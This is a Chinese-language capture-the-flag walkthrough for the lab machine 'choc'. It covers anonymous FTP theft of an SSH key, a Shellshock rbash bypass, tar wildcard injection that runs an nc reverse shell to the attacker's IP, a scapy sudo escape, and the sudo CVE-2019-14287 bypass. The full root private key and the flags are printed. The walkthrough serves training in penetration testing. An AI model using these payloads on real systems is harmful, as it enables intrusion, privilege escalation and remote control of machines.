45.choc
1. 基本信息^toc
2. 信息收集
2.1. 端口扫描
┌──(root㉿kali)-[~/Desktop/hmv/choc]
└─# nmap 192.168.56.15 -p-
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-21 23:44 EST
Stats: 0:00:00 elapsed; 0 hosts completed (0 up), 1 undergoing ARP Ping Scan
ARP Ping Scan Timing: About 100.00% done; ETC: 23:44 (0:00:00 remaining)
Nmap scan report for 192.168.56.15
Host is up (0.00083s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
MAC Address: 08:00:27:E3:98:E8 (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 2.57 seconds
2.2. ftp匿名登录
┌──(root㉿kali)-[~/Desktop/hmv/choc]
└─# ftp 192.168.56.15
Connected to 192.168.56.15.
220 (vsFTPd 3.0.3)
Name (192.168.56.15:root): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -la
229 Entering Extended Passive Mode (|||58838|)
150 Here comes the directory listing.
drwxr-xr-x 2 0 114 4096 Apr 20 2021 .
drwxr-xr-x 2 0 114 4096 Apr 20 2021 ..
-rwxrwxrwx 1 0 0 1811 Apr 20 2021 id_rsa
226 Directory send OK.
ftp> get id_rsa
local: id_rsa remote: id_rsa
229 Entering Extended Passive Mode (|||37705|)
150 Opening BINARY mode data connection for id_rsa (1811 bytes).
100% |**********************************************************| 1811 824.88 KiB/s 00:00 ETA
226 Transfer complete.
1811 bytes received in 00:00 (647.58 KiB/s)
ftp> exit
221 Goodbye.
获取到了私钥,但是不知道对应的用户名
我们利用私钥生成对应的公钥即可
┌──(root㉿kali)-[~/Desktop/hmv/choc]
└─# ssh-keygen -y -f id_rsa
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCxAJzNHJ+k1YTZSCqbdmY4jXCNGuDrEeHLmsEHMDkiHpT1y+IeLVxyUurWkDwwWAes78bfHHkXbINVj7491EjoH3r4OwxhhZa4z9mtWaJlWtdllzEysC6GUr1TIPXc3vZkiPbUuAWYrz4bHbpQoIuYl+cAgOKPKbFRRhfLIOqk+1bsM+LVcWgwT5ZICpxiTOiISNAUPgInrBKkrlFott+jNPuZwTy/yV7Ix4CejknMGg1MquyP+2LyzeEpmf+OcwoS5r/jVWlSddO1Fim373lTNpDOKj2kwNsa9zO/9jAjN7uhu1mh7wb8ldU0ImCep4C6drJSTbfYOLlV7rLgfH0X carl@choc
获取到了用户名是 carl@choc
ssh连接后会立马中断连接。
┌──(root㉿kali)-[~/Desktop/hmv/choc]
└─# ssh -i id_rsa carl@192.168.56.15
##############################
# #
# Welcome to my SSH ! #
# Carl. #
# #
##############################
███████╗ █████╗ ██╗██╗ ███████╗██████╗ ██╗ ██████╗ ██╗
██╔════╝██╔══██╗██║██║ ██╔════╝██╔══██╗ ██║ ██╔═══██╗██║
█████╗ ███████║██║██║ █████╗ ██║ ██║ ██║ ██║ ██║██║
██╔══╝ ██╔══██║██║██║ ██╔══╝ ██║ ██║ ██║ ██║ ██║██║
██║ ██║ ██║██║███████╗███████╗██████╔╝ ███████╗╚██████╔╝███████╗
╚═╝ ╚═╝ ╚═╝╚═╝╚══════╝╚══════╝╚═════╝ ╚══════╝ ╚═════╝ ╚══════╝
Connection to 192.168.56.15 closed.
看来应该给我们了一个rbash
2.3. rbash绕过
尝试一些方法进行绕过
这里可以通过shellshock漏洞绕过
┌──(root㉿kali)-[~/Desktop/hmv/choc]
└─# ssh -i id_rsa carl@192.168.56.15 -t "() { :; }; /bin/bash"
##############################
# #
# Welcome to my SSH ! #
# Carl. #
# #
##############################
carl@choc:~$
3. 提权到torki用户
在 torki用户 目录下发现一个 backup.sh 和一个 diary.txt
-rw-r--r-- 1 torki torki 325 Apr 20 2021 diary.txt
carl@choc:/home/torki/secret_garden$ cat diary.txt
April 18th 2021
Last night I dreamed that I was at the beach with scarlett johansson, worst wake up call of my life!
September 12th 2309
I invented a time machine.The world is still crazy, territorial and proud !!
A day in -4.5000000000
The human doesn't exist yet and that's fucking great!!! but I'm a little bored...
猜测这个 backup.sh 应该会被定时执行
使用pspy64监控 验证正确
2024/12/22 06:45:01 CMD: UID=1001 PID=14411 | /bin/sh -c PATH=.:/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games && export PATH && bash /home/sarah/.local/script.sh
2024/12/22 06:45:01 CMD: UID=1000 PID=14412 | /bin/sh -c bash /home/torki/backup.sh
2024/12/22 06:45:01 CMD: UID=1001 PID=14413 | bash /home/sarah/.local/script.sh
2024/12/22 06:45:01 CMD: UID=1000 PID=14414 | bash /home/torki/backup.sh
2024/12/22 06:45:02 CMD: UID=1002 PID=14415 | /bin/bash
2024/12/22 06:45:06 CMD: UID=1002 PID=14416 | /bin/bash
2024/12/22 06:45:06 CMD: UID=1002 PID=14417 | /bin/bash
2024/12/22 06:45:06 CMD: UID=1002 PID=14419 | /bin/bash
2024/12/22 06:45:06 CMD: UID=1002 PID=14421 | /bin/bash
2024/12/22 06:45:10 CMD: UID=1002 PID=14423 | /bin/bash
2024/12/22 06:45:19 CMD: UID=1002 PID=14425 | /bin/bash
2024/12/22 06:46:01 CMD: UID=0 PID=14427 | /usr/sbin/CRON -f
2024/12/22 06:46:01 CMD: UID=0 PID=14426 | /usr/sbin/cron -f
2024/12/22 06:46:01 CMD: UID=0 PID=14428 | /usr/sbin/CRON -f
2024/12/22 06:46:01 CMD: UID=0 PID=14429 | /usr/sbin/CRON -f
2024/12/22 06:46:01 CMD: UID=1000 PID=14430 | /bin/sh -c bash /home/torki/backup.sh
2024/12/22 06:46:01 CMD: UID=1000 PID=14431 | bash /home/torki/backup.sh
2024/12/22 06:46:01 CMD: UID=1001 PID=14432 | /bin/sh -c PATH=.:/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games && export PATH && bash /home/sarah/.local/script.sh
2024/12/22 06:46:01 CMD: UID=1001 PID=14433 | bash /home/sarah/.local/script.sh
可以发现每分钟 torki 用户都会执行
bash /home/torki/backup.sh
在tmp目录下发现一个 torki 用户的文件 backup_home.tgz
carl@choc:/tmp$ ls -la
total 6988
drwxrwxrwt 8 root root 4096 Dec 22 06:45 .
drwxr-xr-x 19 root root 4096 Apr 18 2021 ..
-rw-r--r-- 1 torki torki 3082240 Dec 22 06:45 backup_home.tgz
把他传下来解压看一下
carl@choc:/tmp$ tar -xvf backup_home.tgz
diary.txt
pspy64
carl@choc:/tmp$ cat diary.txt
April 18th 2021
Last night I dreamed that I was at the beach with scarlett johansson, worst wake up call of my life!
September 12th 2309
I invented a time machine.The world is still crazy, territorial and proud !!
A day in -4.5000000000
The human doesn't exist yet and that's fucking great!!! but I'm a little bored...
发现就是
torki/secret_garden/diary.txt的内容
这里我解压出来还有一个pspy64的原因是 我把pspy64下到了torki/secret_garden/这个目录,他这个脚本应该就是打包torki/secret_garden/目录下的所有文件
我们对 /secret_garden/ 是有写入权限的
3.1. tar漏洞提权
https://book.hacktricks.xyz/zh/linux-hardening/privilege-escalation/wildcards-spare-tricks#tar
在 /secret_garden/ 目录下执行命令
carl@choc:/home/torki/secret_garden$ touch -- '--checkpoint=1'
carl@choc:/home/torki/secret_garden$ touch -- '--checkpoint-action=exec=sh shell.sh'
carl@choc:/home/torki/secret_garden$ echo 'nc -e /bin/bash 192.168.56.6 1234' >shell.sh
(remote) torki@choc:/home/torki/secret_garden$ ls
'--checkpoint=1' '--checkpoint-action=exec=sh shell.sh' diary.txt pspy64 shell.sh
这里touch 要加
--的原因是 让后面的''作为文件名,不然这个单引号会被去掉
然后开启监听等待反弹shell
┌──(root㉿kali)-[~]
└─# pwncat-cs -lp 1234
[01:07:00] Welcome to pwncat 🐈! __main__.py:164
[01:08:47] received connection from 192.168.56.15:44978 bind.py:84
[01:08:47] 0.0.0.0:1234: normalizing shell path manager.py:957
[01:08:48] 192.168.56.15:44978: registered new host w/ db manager.py:957
(local) pwncat$
(remote) torki@choc:/home/torki/secret_garden$ whoami
torki
(remote) torki@choc:/home/torki/secret_garden$ id
uid=1000(torki) gid=1000(torki) groups=1000(torki),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
(remote) torki@choc:/home/torki$ cat backup.sh
#!/bin/bash
cd /home/torki/secret_garden
tar cf /tmp/backup_home.tgz *
4. 提权到sarah
(remote) torki@choc:/home/torki$ sudo -l
User torki may run the following commands on choc:
(sarah) NOPASSWD: /usr/bin/scapy
scapy可以用来发各种协议的数据包,但是他实际上是一个python,所以可以利用像python一样开启一个shell
(remote) torki@choc:/home$ sudo -u sarah scapy
WARNING: Cannot read wireshark manuf database
INFO: Can't import matplotlib. Won't be able to plot.
INFO: Can't import PyX. Won't be able to use psdump() or pdfdump().
WARNING: Failed to execute tcpdump. Check it is installed and in the PATH
WARNING: No route found for IPv6 destination :: (no default route?)
INFO: Can't import python-cryptography v1.7+. Disabled WEP decryption/encryption. (Dot11)
INFO: Can't import python-cryptography v1.7+. Disabled IPsec encryption/authentication.
WARNING: IPython not available. Using standard Python shell instead.
AutoCompletion, History are disabled.
aSPY//YASa
apyyyyCY//////////YCa |
sY//////YSpcs scpCY//Pp | Welcome to Scapy
ayp ayyyyyyySCP//Pp syY//C | Version 2.4.0
AYAsAYYYYYYYY///Ps cY//S |
pCCCCY//p cSSps y//Y | https://github.com/secdev/scapy
SPPPP///a pP///AC//Y |
A//A cyP////C | Have fun!
p///Ac sC///a |
P////YCpc A//A | Craft packets like I craft my beer.
scccccp///pSP///p p//Y | -- Jean De Clerck
sY/////////y caa S//P |
cayCyayP//Ya pY/Ya
sY/PsY////YCc aC//Yp
sc sccaCY//PCypaapyCP//YSs
spCPY//////YPSps
ccaacs
>>> import os
>>> os.system('/bin/bash')
sarah@choc:/home$ whoami
sarah
5. 提权root
sarah@choc:~$ cat quotes.txt
“You must have chaos within you to give birth to a dancing star.”
“It is not a lack of love, but a lack of friendship that makes unhappy marriages.”
“The multiplication of our kind borders on the obscene; the duty to love them, on the preposterous.”
“We do not die because we have to die; we die because one day, and not so long ago, our consciousness was forced to deem it necessary.“
“Luke, I am your father"
sarah@choc:~$ cat user.txt
commenquaded
sarah@choc:~$ sudo -l
User sarah may run the following commands on choc:
(ALL, !root) NOPASSWD: /usr/bin/wall
!root 表示出了root用户 其他用户都可以用 wall 且不输入密码
5.1. sudo root 权限绕过 CVE-2019-14287
Caution
hacktircks 这里是错误的,正确的版本应该是 <1.8.28
sarah@choc:/home/torki$ sudo -V
Sudo version 1.8.23
Sudoers policy plugin version 1.8.23
Sudoers file grammar version 46
Sudoers I/O plugin version 1.8.23
sarah@choc:/home/torki$ sudo -u#-1 wall --nobanner "/root/.ssh/id_rsa"
wall命令 会向 所有登录的用户 广播消息,所以我们需要用另外一个终端来接受私钥
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABFwAAAAdzc2gtcn
NhAAAAAwEAAQAAAQEAuSMhRxXhWoexxyZWPK4pkjyVHhT1jAmUYdEhKEFBLZh9z93ZW25M
lrj03xjFd4zP5AAHEG9p5h5SNi3ltHTtml7Nj59XlV6Heru/cwX7Yykxu75tZRxzQR4EjV
qUmxvqJgfql+XzKg3JgNwHRpG3tcW8Rdxbb3owVR97kjZP+3kA/pQGrQKdFe893Q1u2oDa
4R+v+jsYmzwjf/1M8m/S+J0hYzTOI+kQlBnZmMvpJYDidmyG1RO3dcLCpxCQpydH7GfO/s
6j0DdCvDr6+8C4eAzgDE5irjdMh2dKySNveNiMuhzsv1PS33ZWgx/ITlxu9zwiuufQm6D5
TcDYKMGCSQAAA8DHBCmTxwQpkwAAAAdzc2gtcnNhAAABAQC5IyFHFeFah7HHJlY8rimSPJ
UeFPWMCZRh0SEoQUEtmH3P3dlbbkyWuPTfGMV3jM/kAAcQb2nmHlI2LeW0dO2aXs2Pn1eV
Xod6u79zBftjKTG7vm1lHHNBHgSNWpSbG+omB+qX5fMqDcmA3AdGkbe1xbxF3FtvejBVH3
uSNk/7eQD+lAatAp0V7z3dDW7agNrhH6/6OxibPCN//Uzyb9L4nSFjNM4j6RCUGdmYy+kl
gOJ2bIbVE7d1wsKnEJCnJ0fsZ87+zqPQN0K8Ovr7wLh4DOAMTmKuN0yHZ0rJI2942Iy6HO
y/U9LfdlaDH8hOXG73PCK659CboPlNwNgowYJJAAAAAwEAAQAAAQAQK31QlBymp4tjdXm6
uwtudlQf2HzJylxnXriip3Bl5xe1/A5r6epOj8Dza1pz4pyVsVrsmI6LRsKvcLrLVBscjI
MvtB8WMLdshNFn3nHia0qoty0e06lNWq3TGsI3+ewtfiuDMNZYKfQbiRwpkbiV67tR7rkd
t3JZPPKyBoRd1kGjnPzJc2DPyaAtJtS21w86ZxJZtaMWUL6SE1+80VWv0XXPtlmAipfdgF
76A/Z4izCNolx0s+Ptus8gqaxJDeGI4xX5aZZ33kc5cSvNjI2hH6kFX39sS7beVz/zYDKA
BkJ0fZpNQ+HZfqGvT93YHAFZVpdlv7ysn16oNkOwZuZxAAAAgQCs/OtmKQ2SXR0ZrVryDk
58HSK2xCRcMaOqNamWSm+JaKEusms25bCD3liQGbazJyy6eS7iR2DOQPYwdU94dak72X+W
xwOexz8pwHGflvrA7SlKW4pXshuccpxgdC/KkqZRQyQvy7NbDTyGM+3uTQSnABmZWl8mJa
NtfY+fCEoKDgAAAIEA5urQzWNxzvBa4krknAuUMRD8TcsL4NjE6QCj9D1KJh2vGiBqNYjH
f6hZ+4LPFlaWiusjxZAF6vIaZJU0UHRzdcITqm1L20CZQr2D3tgWS6+VAGQHb1me5uoC4J
6Px6A7preSEjS2GtECqWxZevl8YqWEJtWaO1WDK61+Mr266UsAAACBAM0/S7QUbRqSmNTq
wd/4y9U4JxtOfeV4O0I+JNlTPkA2vdUeHEwWkKRqk3re72JwYlUAsD4AhXO1oEdfpO32fx
wavKtBNMpI64CiNVrPY8w9DPoWdCzxtFeRq1V50i9wdiVlHIdn0Ac+6T9Wv/0v8J7GXIkH
gskjOtELMuhigHo7AAAACXJvb3RAY2hvYwE=
-----END OPENSSH PRIVATE KEY-----
ssh连接那flag
root@choc:~# cat r00t.txt
inesbywal